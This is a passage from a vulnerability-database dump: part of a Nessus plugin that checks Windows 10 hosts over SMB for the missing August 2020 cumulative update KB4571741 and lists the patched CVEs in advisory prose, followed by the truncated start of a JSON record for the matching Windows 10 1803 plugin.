(description)\n{\n script_id(139494);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/06\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1417\",\n \"CVE-2020-1464\",\n \"CVE-2020-1470\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1479\",\n \"CVE-2020-1480\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1510\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1521\",\n \"CVE-2020-1522\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1528\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1535\",\n \"CVE-2020-1536\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1539\",\n \"CVE-2020-1540\",\n \"CVE-2020-1541\",\n \"CVE-2020-1542\",\n \"CVE-2020-1543\",\n \"CVE-2020-1544\",\n \"CVE-2020-1545\",\n \"CVE-2020-1546\",\n \"CVE-2020-1547\",\n \"CVE-2020-1549\",\n \"CVE-2020-1550\",\n \"CVE-2020-1551\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1555\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"MSKB\", value:\"4571741\");\n script_xref(name:\"MSFT\", value:\"MS20-4571741\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n\n script_name(english:\"KB4571741: Windows 10 Version 1709 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571741.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the\n Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the\n Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge (HTML-based). The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539,\n CVE-2020-1540, CVE-2020-1541, CVE-2020-1542,\n CVE-2020-1543, CVE-2020-1544, CVE-2020-1545,\n CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4571741/windows-10-update-kb4571741\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9371bc74\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4571741.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571741'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'16299',\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571741])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:09:28", "description": "The remote Windows host is missing security update 4571709.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1569)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Shell Components improperly handle memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass. An attacker who successfully exploited the vulnerability could retrieve the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571709: Windows 10 Version 1803 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1417", "CVE-2020-1464", "CVE-2020-1470", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1479", "CVE-2020-1480", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1510", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1521", "CVE-2020-1522", "CVE-2020-1524", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1528", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1535", "CVE-2020-1536", "CVE-2020-1537", "CVE-2020-1538", 